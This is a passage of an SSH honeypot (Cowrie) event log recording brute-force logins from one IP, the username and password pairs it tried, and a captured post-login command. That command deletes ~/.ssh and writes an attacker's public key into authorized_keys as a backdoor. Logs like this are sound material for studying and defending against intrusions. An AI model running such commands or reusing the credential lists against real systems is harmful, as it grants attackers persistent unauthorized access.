03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:30:34.301204Z","src_ip":"212.227.235.229","session":"717f048054bb"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T14:30:34.817879Z","src_ip":"212.227.235.229","session":"717f048054bb"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:30:35.939042Z","src_ip":"212.227.235.229","session":"717f048054bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49792,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0b0ed6d1b63","protocol":"ssh","message":"New connection: 212.227.235.229:49792 (1.2.3.4:22) [session: c0b0ed6d1b63]","sensor":"my-vps","timestamp":"2025-09-08T14:30:36.060654Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:30:36.061647Z","src_ip":"212.227.235.229","session":"c0b0ed6d1b63"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:30:36.182932Z","src_ip":"212.227.235.229","session":"c0b0ed6d1b63"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:30:36.713346Z","src_ip":"212.227.235.229","session":"c0b0ed6d1b63"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:30:36.836471Z","src_ip":"212.227.235.229","session":"89ef15a2fe3c"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:30:36.837328Z","src_ip":"212.227.235.229","session":"c0b0ed6d1b63"}
{"eventid":"cowrie.session.closed","duration":31.259365797042847,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:31:02.612667Z","src_ip":"61.77.88.90","session":"8d4bbd305009"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43130,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2dfe013f610","protocol":"ssh","message":"New connection: 212.227.235.229:43130 (1.2.3.4:22) [session: c2dfe013f610]","sensor":"my-vps","timestamp":"2025-09-08T14:31:37.635992Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:31:37.636866Z","src_ip":"212.227.235.229","session":"c2dfe013f610"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:31:37.760811Z","src_ip":"212.227.235.229","session":"c2dfe013f610"}
{"eventid":"cowrie.login.failed","username":"dmdba","password":"111","message":"login attempt [dmdba/111] failed","sensor":"my-vps","timestamp":"2025-09-08T14:31:38.292233Z","src_ip":"212.227.235.229","session":"c2dfe013f610"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:31:39.416986Z","src_ip":"212.227.235.229","session":"c2dfe013f610"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45672,"dst_ip":"1.2.3.4","dst_port":22,"session":"73f3005f0adb","protocol":"ssh","message":"New connection: 212.227.235.229:45672 (1.2.3.4:22) [session: 73f3005f0adb]","sensor":"my-vps","timestamp":"2025-09-08T14:32:44.092146Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:32:44.093898Z","src_ip":"212.227.235.229","session":"73f3005f0adb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:32:44.213046Z","src_ip":"212.227.235.229","session":"73f3005f0adb"}
{"eventid":"cowrie.login.failed","username":"build","password":"12345","message":"login attempt [build/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T14:32:44.734883Z","src_ip":"212.227.235.229","session":"73f3005f0adb"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:32:45.856720Z","src_ip":"212.227.235.229","session":"73f3005f0adb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39608,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8e23deb64e4","protocol":"ssh","message":"New connection: 212.227.235.229:39608 (1.2.3.4:22) [session: c8e23deb64e4]","sensor":"my-vps","timestamp":"2025-09-08T14:33:53.102818Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:33:53.103922Z","src_ip":"212.227.235.229","session":"c8e23deb64e4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:33:53.228028Z","src_ip":"212.227.235.229","session":"c8e23deb64e4"}
{"eventid":"cowrie.login.failed","username":"hack","password":"1","message":"login attempt [hack/1] failed","sensor":"my-vps","timestamp":"2025-09-08T14:33:53.765207Z","src_ip":"212.227.235.229","session":"c8e23deb64e4"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:33:54.891164Z","src_ip":"212.227.235.229","session":"c8e23deb64e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36250,"dst_ip":"1.2.3.4","dst_port":22,"session":"14ccaa2a94f6","protocol":"ssh","message":"New connection: 212.227.235.229:36250 (1.2.3.4:22) [session: 14ccaa2a94f6]","sensor":"my-vps","timestamp":"2025-09-08T14:35:00.864063Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:35:00.864975Z","src_ip":"212.227.235.229","session":"14ccaa2a94f6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:35:00.984238Z","src_ip":"212.227.235.229","session":"14ccaa2a94f6"}
{"eventid":"cowrie.login.success","username":"root","password":"1234abc","message":"login attempt [root/1234abc] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:35:01.507950Z","src_ip":"212.227.235.229","session":"14ccaa2a94f6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:35:01.814236Z","src_ip":"212.227.235.229","session":"14ccaa2a94f6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:35:01.815004Z","src_ip":"212.227.235.229","session":"14ccaa2a94f6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:35:01.816324Z","src_ip":"212.227.235.229","session":"14ccaa2a94f6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:35:01.938161Z","src_ip":"212.227.235.229","session":"14ccaa2a94f6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:35:02.239751Z","src_ip":"212.227.235.229","session":"14ccaa2a94f6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T14:35:02.240494Z","src_ip":"212.227.235.229","session":"14ccaa2a94f6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T14:35:02.363130Z","src_ip":"212.227.235.229","session":"14ccaa2a94f6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:35:02.364126Z","src_ip":"212.227.235.229","session":"14ccaa2a94f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36266,"dst_ip":"1.2.3.4","dst_port":22,"session":"04e2f7ff8727","protocol":"ssh","message":"New connection: 212.227.235.229:36266 (1.2.3.4:22) [session: 04e2f7ff8727]","sensor":"my-vps","timestamp":"2025-09-08T14:35:02.484634Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:35:02.485263Z","src_ip":"212.227.235.229","session":"04e2f7ff8727"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:35:02.608576Z","src_ip":"212.227.235.229","session":"04e2f7ff8727"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T14:35:03.144027Z","src_ip":"212.227.235.229","session":"04e2f7ff8727"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:35:04.268854Z","src_ip":"212.227.235.229","session":"04e2f7ff8727"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36272,"dst_ip":"1.2.3.4","dst_port":22,"session":"37d6f15c475e","protocol":"ssh","message":"New connection: 212.227.235.229:36272 (1.2.3.4:22) [session: 37d6f15c475e]","sensor":"my-vps","timestamp":"2025-09-08T14:35:04.390930Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:35:04.391847Z","src_ip":"212.227.235.229","session":"37d6f15c475e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:35:04.514041Z","src_ip":"212.227.235.229","session":"37d6f15c475e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:35:05.043156Z","src_ip":"212.227.235.229","session":"37d6f15c475e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:35:05.167376Z","src_ip":"212.227.235.229","session":"37d6f15c475e"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:35:05.168446Z","src_ip":"212.227.235.229","session":"14ccaa2a94f6"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49822,"dst_ip":"1.2.3.4","dst_port":22,"session":"93c436f30ec7","protocol":"ssh","message":"New connection: 217.72.205.35:49822 (1.2.3.4:22) [session: 93c436f30ec7]","sensor":"my-vps","timestamp":"2025-09-08T14:35:12.913526Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:35:12.914602Z","src_ip":"217.72.205.35","session":"93c436f30ec7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60450,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6d6e809f38a","protocol":"ssh","message":"New connection: 212.227.235.229:60450 (1.2.3.4:22) [session: c6d6e809f38a]","sensor":"my-vps","timestamp":"2025-09-08T14:36:09.292213Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:36:09.293138Z","src_ip":"212.227.235.229","session":"c6d6e809f38a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:36:09.415271Z","src_ip":"212.227.235.229","session":"c6d6e809f38a"}
{"eventid":"cowrie.login.success","username":"root","password":"3edcXSW@","message":"login attempt [root/3edcXSW@] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:36:09.947384Z","src_ip":"212.227.235.229","session":"c6d6e809f38a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:36:10.210341Z","src_ip":"212.227.235.229","session":"c6d6e809f38a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:36:10.211031Z","src_ip":"212.227.235.229","session":"c6d6e809f38a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:36:10.211993Z","src_ip":"212.227.235.229","session":"c6d6e809f38a"}
